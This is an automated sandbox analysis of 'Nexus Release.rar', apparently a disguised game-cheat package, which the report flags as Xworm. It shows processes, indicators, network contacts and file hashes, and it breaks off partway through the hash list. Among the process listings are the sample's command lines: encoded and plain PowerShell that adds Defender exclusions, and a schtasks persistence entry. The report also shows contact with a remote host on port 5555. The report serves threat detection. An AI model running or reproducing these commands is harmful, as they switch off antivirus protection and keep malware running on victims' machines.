Analysis Overview
SHA256
e6bd9b2b687e9a2381b43d1fabeca64e5ed727676b5b9470220252e4098a22b6
Threat Level: Known bad
The file Nexus Release.rar was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Drops startup file
Checks computer location settings
Executes dropped EXE
Looks up external IP address via web service
Adds Run key to start application
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Modifies registry class
Suspicious use of SendNotifyMessage
Creates scheduled task(s)
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-11 17:39
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-11 17:39
Reported
2024-06-11 17:42
Platform
win10v2004-20240426-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Nexus Release\ByfronHook.dll",#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.143.182.52.in-addr.arpa | udp |
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-06-11 17:39
Reported
2024-06-11 17:42
Platform
win10v2004-20240426-en
Max time kernel
90s
Max time network
144s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Nexus Release\assets.dll",#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-06-11 17:39
Reported
2024-06-11 17:42
Platform
win7-20240220-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\Nexus Release\instructions.txt"
Network
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-06-11 17:39
Reported
2024-06-11 17:42
Platform
win10v2004-20240508-en
Max time kernel
146s
Max time network
151s
Command Line
Signatures
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\Nexus Release\instructions.txt"
Network
| Country | Destination | Domain | Proto |
| NL | 52.142.223.178:80 | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-11 17:39
Reported
2024-06-11 17:42
Platform
win7-20240221-en
Max time kernel
121s
Max time network
123s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Nexus Release\ByfronHook.dll",#1
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-06-11 17:39
Reported
2024-06-11 17:42
Platform
win10v2004-20240508-en
Max time kernel
147s
Max time network
150s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Nexus Release\Nexus Release V1.5.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\nexus.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows Runtime.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows Runtime.exe | N/A |
Loads dropped DLL
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Runtime = "C:\\ProgramData\\Windows Runtime.exe" | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\nexus.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\Windows Runtime.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\Windows Runtime.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Nexus Release\Nexus Release V1.5.exe
"C:\Users\Admin\AppData\Local\Temp\Nexus Release\Nexus Release V1.5.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGMAbABkACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBnAGcALwBuAGUAeAB1AHMAbABvAGEAZABlAHIAIABSAHUAbgAgAEEAcwAgAEEAZABtAGkAbgAgAEkAZgAgAEkAbgBqAGUAYwB0AGkAbwBuACAARgBhAGkAbABzACcALAAnACcALAAnAE8ASwAnACwAJwBXAGEAcgBuAGkAbgBnACcAKQA8ACMAdwBmAGMAIwA+AA=="
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAZABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcwB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAbABpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBlACMAPgA="
C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Users\Admin\AppData\Local\dllhost.exe
"C:\Users\Admin\AppData\Local\dllhost.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\nexus.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Runtime.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Runtime.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Runtime" /tr "C:\ProgramData\Windows Runtime.exe"
C:\ProgramData\Windows Runtime.exe
"C:\ProgramData\Windows Runtime.exe"
C:\ProgramData\Windows Runtime.exe
"C:\ProgramData\Windows Runtime.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | u.cubeupload.com | udp |
| NL | 91.92.241.69:5555 | tcp | |
| NL | 91.92.241.69:5555 | tcp | |
| NL | 91.92.241.69:5555 | tcp | |
| NL | 91.92.241.69:5555 | tcp | |
| NL | 91.92.241.69:5555 | tcp |
Files
memory/1540-0-0x000000007367E000-0x000000007367F000-memory.dmp
memory/1164-2-0x0000000073670000-0x0000000073E20000-memory.dmp
memory/1164-1-0x0000000002A80000-0x0000000002AB6000-memory.dmp
memory/1164-3-0x00000000051F0000-0x0000000005818000-memory.dmp
memory/1540-4-0x0000000073670000-0x0000000073E20000-memory.dmp
memory/1164-10-0x0000000073670000-0x0000000073E20000-memory.dmp
C:\Users\Admin\AppData\Roaming\svchost.exe
| MD5 | 28fdeaf0607d576de1b00981421e03c8 |
| SHA1 | 71cad5e001a788429639eb721585a5cafbff488b |
| SHA256 | bad905acaa547a246c37c06b39f0d6f473489a6a1900245548a6341a87bb8a77 |
| SHA512 | 915e9867450c4cd78ec42a779f4a53e86e4645a0c6f65a37d6818d086db2bc90afb116786a53daf041277eede1920053d083d548d6ba33314abf095887792bb0 |
memory/1540-11-0x0000000073670000-0x0000000073E20000-memory.dmp
memory/1164-12-0x0000000073670000-0x0000000073E20000-memory.dmp
memory/1540-25-0x0000000005AD0000-0x0000000005B36000-memory.dmp
memory/1164-27-0x0000000005900000-0x0000000005966000-memory.dmp
C:\Users\Admin\AppData\Local\dllhost.exe
| MD5 | cc7686bf7c7d81f59196d5cc3cab3348 |
| SHA1 | ac39079f223f87d404c421c48239f913b12f00a8 |
| SHA256 | 49c175257966f191a2abce16d8533d359fc27ecf6512da870a9c59937914d5f7 |
| SHA512 | 940cfb37c1f5e5dbd86cc14d5a0a85dfaf889754051d4fc0d0afbe7bedceaec91b5f36b873b5e24cd081432db1b7d61df72a198681b9ab8e3a9b57197cfb58ae |
memory/1164-34-0x0000000005A70000-0x0000000005DC4000-memory.dmp
memory/876-47-0x0000000000CB0000-0x0000000000CC8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zwrplsc5.kwu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1540-23-0x00000000050A0000-0x00000000050C2000-memory.dmp
memory/1540-63-0x0000000006150000-0x000000000616E000-memory.dmp
memory/1164-72-0x0000000006570000-0x00000000065BC000-memory.dmp
memory/1540-821-0x0000000006670000-0x000000000668A000-memory.dmp
memory/1540-819-0x0000000007910000-0x0000000007F8A000-memory.dmp
memory/1164-864-0x0000000007000000-0x0000000007032000-memory.dmp
memory/1164-907-0x0000000006630000-0x000000000664E000-memory.dmp
memory/1540-961-0x0000000008540000-0x0000000008AE4000-memory.dmp
memory/1164-963-0x0000000007240000-0x00000000072E3000-memory.dmp
memory/1164-884-0x00000000744C0000-0x000000007450C000-memory.dmp
memory/1540-1007-0x0000000007520000-0x00000000075B2000-memory.dmp
memory/1164-1092-0x00000000073F0000-0x00000000073FA000-memory.dmp
memory/1164-1093-0x0000000007610000-0x00000000076A6000-memory.dmp
memory/1164-1094-0x0000000007580000-0x0000000007591000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\python310.dll
| MD5 | 384349987b60775d6fc3a6d202c3e1bd |
| SHA1 | 701cb80c55f859ad4a31c53aa744a00d61e467e5 |
| SHA256 | f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8 |
| SHA512 | 6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5 |
C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\nexus.exe
| MD5 | a7940c3b4fa027664ab5c18bc794bf36 |
| SHA1 | b7a678427915eeb55b9da86c057a7fd3d61bdd15 |
| SHA256 | 41f7a63a0f786d751c009fe4b06b7c8755a7aaaf82a252da6878e0a1b967608d |
| SHA512 | 30fcc79f07123ac078177a69dc1ae4146934ae6f60e4317ac1183058da26bf69fbf23a4d5d5b1e788253ddfcbd0b8c932a4a41f47d78f8407bc4a14627e9fb1c |
C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\VCRUNTIME140.dll
| MD5 | 11d9ac94e8cb17bd23dea89f8e757f18 |
| SHA1 | d4fb80a512486821ad320c4fd67abcae63005158 |
| SHA256 | e1d6f78a72836ea120bd27a33ae89cbdc3f3ca7d9d0231aaa3aac91996d2fa4e |
| SHA512 | aa6afd6bea27f554e3646152d8c4f96f7bcaaa4933f8b7c04346e410f93f23cfa6d29362fd5d51ccbb8b6223e094cd89e351f072ad0517553703f5bf9de28778 |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_bz2.pyd
| MD5 | b45e82a398713163216984f2feba88f6 |
| SHA1 | eaaf4b91db6f67d7c57c2711f4e968ce0fe5d839 |
| SHA256 | 4c2649dc69a8874b91646723aacb84c565efeaa4277c46392055bca9a10497a8 |
| SHA512 | b9c4f22dc4b52815c407ab94d18a7f2e1e4f2250aecdb2e75119150e69b006ed69f3000622ec63eabcf0886b7f56ffdb154e0bf57d8f7f45c3b1dd5c18b84ec8 |
C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\_lzma.pyd
| MD5 | 5a77a1e70e054431236adb9e46f40582 |
| SHA1 | be4a8d1618d3ad11cfdb6a366625b37c27f4611a |
| SHA256 | f125a885c10e1be4b12d988d6c19128890e7add75baa935fe1354721aa2dea3e |
| SHA512 | 3c14297a1400a93d1a01c7f8b4463bfd6be062ec08daaf5eb7fcbcde7f4fa40ae06e016ff0de16cb03b987c263876f2f437705adc66244d3ee58f23d6bf7f635 |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\select.pyd
| MD5 | 78d421a4e6b06b5561c45b9a5c6f86b1 |
| SHA1 | c70747d3f2d26a92a0fe0b353f1d1d01693929ac |
| SHA256 | f1694ce82da997faa89a9d22d469bfc94abb0f2063a69ec9b953bc085c2cb823 |
| SHA512 | 83e02963c9726a40cd4608b69b4cdf697e41c9eedfb2d48f3c02c91500e212e7e0ab03e6b3f70f42e16e734e572593f27b016b901c8aa75f674b6e0fbb735012 |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libssl-1_1.dll
| MD5 | bd857f444ebbf147a8fcd1215efe79fc |
| SHA1 | 1550e0d241c27f41c63f197b1bd669591a20c15b |
| SHA256 | b7c0e42c1a60a2a062b899c8d4ebd0c50ef956177ba21785ce07c517c143aeaf |
| SHA512 | 2b85c1521edeadf7e118610d6546fafbbad43c288a7f0f9d38d97c4423a541dfac686634cde956812916830fbb4aad8351a23d95cd490c4a5c0f628244d30f0a |
C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\_hashlib.pyd
| MD5 | cfb9e0a73a6c9d6d35c2594e52e15234 |
| SHA1 | b86042c96f2ce6d8a239b7d426f298a23df8b3b9 |
| SHA256 | 50daeb3985302a8d85ce8167b0bf08b9da43e7d51ceae50e8e1cdfb0edf218c6 |
| SHA512 | 22a5fd139d88c0eee7241c5597d8dbbf2b78841565d0ed0df62383ab50fde04b13a203bddef03530f8609f5117869ed06894a572f7655224285823385d7492d2 |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\unicodedata.pyd
| MD5 | a40ff441b1b612b3b9f30f28fa3c680d |
| SHA1 | 42a309992bdbb68004e2b6b60b450e964276a8fc |
| SHA256 | 9b22d93f4db077a70a1d85ffc503980903f1a88e262068dd79c6190ec7a31b08 |
| SHA512 | 5f9142b16ed7ffc0e5b17d6a4257d7249a21061fe5e928d3cde75265c2b87b723b2e7bd3109c30d2c8f83913134445e8672c98c187073368c244a476ac46c3ef |
C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\_cffi_backend.pyd
| MD5 | ebb660902937073ec9695ce08900b13d |
| SHA1 | 881537acead160e63fe6ba8f2316a2fbbb5cb311 |
| SHA256 | 52e5a0c3ca9b0d4fc67243bd8492f5c305ff1653e8d956a2a3d9d36af0a3e4fd |
| SHA512 | 19d5000ef6e473d2f533603afe8d50891f81422c59ae03bead580412ec756723dc3379310e20cd0c39e9683ce7c5204791012e1b6b73996ea5cb59e8d371de24 |
C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\Crypto\Cipher\_raw_ctr.pyd
| MD5 | c6b20332b4814799e643badffd8df2cd |
| SHA1 | e7da1c1f09f6ec9a84af0ab0616afea55a58e984 |
| SHA256 | 61c7a532e108f67874ef2e17244358df19158f6142680f5b21032ba4889ac5d8 |
| SHA512 | d50c7f67d2dfb268ad4cf18e16159604b6e8a50ea4f0c9137e26619fd7835faad323b5f6a2b8e3ec1c023e0678bcbe5d0f867cd711c5cd405bd207212228b2b4 |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\Crypto\Hash\_ghash_portable.pyd
| MD5 | c4cc05d3132fdfb05089f42364fc74d2 |
| SHA1 | da7a1ae5d93839577bbd25952a1672c831bc4f29 |
| SHA256 | 8f3d92de840abb5a46015a8ff618ff411c73009cbaa448ac268a5c619cf84721 |
| SHA512 | c597c70b7af8e77beeebf10c32b34c37f25c741991581d67cf22e0778f262e463c0f64aa37f92fbc4415fe675673f3f92544e109e5032e488f185f1cfbc839fe |
C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\Crypto\Hash\_ghash_clmul.pyd
| MD5 | c89becc2becd40934fe78fcc0d74d941 |
| SHA1 | d04680df546e2d8a86f60f022544db181f409c50 |
| SHA256 | e5b6e58d6da8db36b0673539f0c65c80b071a925d2246c42c54e9fcdd8ca08e3 |
| SHA512 | 715b3f69933841baadc1c30d616db34e6959fd9257d65e31c39cd08c53afa5653b0e87b41dcc3c5e73e57387a1e7e72c0a668578bd42d5561f4105055f02993c |
C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\Crypto\Util\_cpuid_c.pyd
| MD5 | 4d9c33ae53b38a9494b6fbfa3491149e |
| SHA1 | 1a069e277b7e90a3ab0dcdee1fe244632c9c3be4 |
| SHA256 | 0828cad4d742d97888d3dfce59e82369317847651bba0f166023cb8aca790b2b |
| SHA512 | bdfbf29198a0c7ed69204bf9e9b6174ebb9e3bee297dd1eb8eb9ea6d7caf1cc5e076f7b44893e58ccf3d0958f5e3bdee12bd090714beb5889836ee6f12f0f49e |
C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\Crypto\Protocol\_scrypt.pyd
| MD5 | ba46602b59fcf8b01abb135f1534d618 |
| SHA1 | eff5608e05639a17b08dca5f9317e138bef347b5 |
| SHA256 | b1bab0e04ac60d1e7917621b03a8c72d1ed1f0251334e9fa12a8a1ac1f516529 |
| SHA512 | a5e2771623da697d8ea2e3212fbdde4e19b4a12982a689d42b351b244efba7efa158e2ed1a2b5bc426a6f143e7db810ba5542017ab09b5912b3ecc091f705c6e |
C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\Crypto\Cipher\_Salsa20.pyd
| MD5 | 371776a7e26baeb3f75c93a8364c9ae0 |
| SHA1 | bf60b2177171ba1c6b4351e6178529d4b082bda9 |
| SHA256 | 15257e96d1ca8480b8cb98f4c79b6e365fe38a1ba9638fc8c9ab7ffea79c4762 |
| SHA512 | c23548fbcd1713c4d8348917ff2ab623c404fb0e9566ab93d147c62e06f51e63bdaa347f2d203fe4f046ce49943b38e3e9fa1433f6455c97379f2bc641ae7ce9 |
C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\Crypto\Hash\_SHA256.pyd
| MD5 | a442ea85e6f9627501d947be3c48a9dd |
| SHA1 | d2dec6e1be3b221e8d4910546ad84fe7c88a524d |
| SHA256 | 3dbcb4d0070be355e0406e6b6c3e4ce58647f06e8650e1ab056e1d538b52b3d3 |
| SHA512 | 850a00c7069ffdba1efe1324405da747d7bd3ba5d4e724d08a2450b5a5f15a69a0d3eaf67cef943f624d52a4e2159a9f7bdaeafdc6c689eacea9987414250f3b |
C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\Crypto\Hash\_SHA1.pyd
| MD5 | ab0bcb36419ea87d827e770a080364f6 |
| SHA1 | 6d398f48338fb017aacd00ae188606eb9e99e830 |
| SHA256 | a927548abea335e6bcb4a9ee0a949749c9e4aa8f8aad481cf63e3ac99b25a725 |
| SHA512 | 3580fb949acee709836c36688457908c43860e68a36d3410f3fa9e17c6a66c1cdd7c081102468e4e92e5f42a0a802470e8f4d376daa4ed7126818538e0bd0bc4 |
C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\Crypto\Hash\_BLAKE2s.pyd
| MD5 | 9d28433ea8ffbfe0c2870feda025f519 |
| SHA1 | 4cc5cf74114d67934d346bb39ca76f01f7acc3e2 |
| SHA256 | fc296145ae46a11c472f99c5be317e77c840c2430fbb955ce3f913408a046284 |
| SHA512 | 66b4d00100d4143ea72a3f603fb193afa6fd4efb5a74d0d17a206b5ef825e4cc5af175f5fb5c40c022bde676ba7a83087cb95c9f57e701ca4e7f0a2fce76e599 |
C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\Crypto\Util\_strxor.pyd
| MD5 | 8f4313755f65509357e281744941bd36 |
| SHA1 | 2aaf3f89e56ec6731b2a5fa40a2fe69b751eafc0 |
| SHA256 | 70d90ddf87a9608699be6bbedf89ad469632fd0adc20a69da07618596d443639 |
| SHA512 | fed2b1007e31d73f18605fb164fee5b46034155ab5bb7fe9b255241cfa75ff0e39749200eb47a9ab1380d9f36f51afba45490979ab7d112f4d673a0c67899ef4 |
C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\Crypto\Cipher\_raw_ofb.pyd
| MD5 | 4d9182783ef19411ebd9f1f864a2ef2f |
| SHA1 | ddc9f878b88e7b51b5f68a3f99a0857e362b0361 |
| SHA256 | c9f4c5ffcdd4f8814f8c07ce532a164ab699ae8cde737df02d6ecd7b5dd52dbd |
| SHA512 | 8f983984f0594c2cac447e9d75b86d6ec08ed1c789958afa835b0d1239fd4d7ebe16408d080e7fce17c379954609a93fc730b11be6f4a024e7d13d042b27f185 |
C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\Crypto\Cipher\_raw_cfb.pyd
| MD5 | 43bbe5d04460bd5847000804234321a6 |
| SHA1 | 3cae8c4982bbd73af26eb8c6413671425828dbb7 |
| SHA256 | faa41385d0db8d4ee2ee74ee540bc879cf2e884bee87655ff3c89c8c517eed45 |
| SHA512 | dbc60f1d11d63bebbab3c742fb827efbde6dff3c563ae1703892d5643d5906751db3815b97cbfb7da5fcd306017e4a1cdcc0cdd0e61adf20e0816f9c88fe2c9b |
C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\Crypto\Cipher\_raw_cbc.pyd
| MD5 | 20708935fdd89b3eddeea27d4d0ea52a |
| SHA1 | 85a9fe2c7c5d97fd02b47327e431d88a1dc865f7 |
| SHA256 | 11dd1b49f70db23617e84e08e709d4a9c86759d911a24ebddfb91c414cc7f375 |
| SHA512 | f28c31b425dc38b5e9ad87b95e8071997e4a6f444608e57867016178cd0ca3e9f73a4b7f2a0a704e45f75b7dcff54490510c6bf8461f3261f676e9294506d09b |
C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\Crypto\Cipher\_raw_ecb.pyd
| MD5 | fee13d4fb947835dbb62aca7eaff44ef |
| SHA1 | 7cc088ab68f90c563d1fe22d5e3c3f9e414efc04 |
| SHA256 | 3e0d07bbf93e0748b42b1c2550f48f0d81597486038c22548224584ae178a543 |
| SHA512 | dea92f935bc710df6866e89cc6eb5b53fc7adf0f14f3d381b89d7869590a1b0b1f98f347664f7a19c6078e7aa3eb0f773ffcb711cc4275d0ecd54030d6cf5cb2 |
C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\charset_normalizer\md__mypyc.pyd
| MD5 | 494f5b9adc1cfb7fdb919c9b1af346e1 |
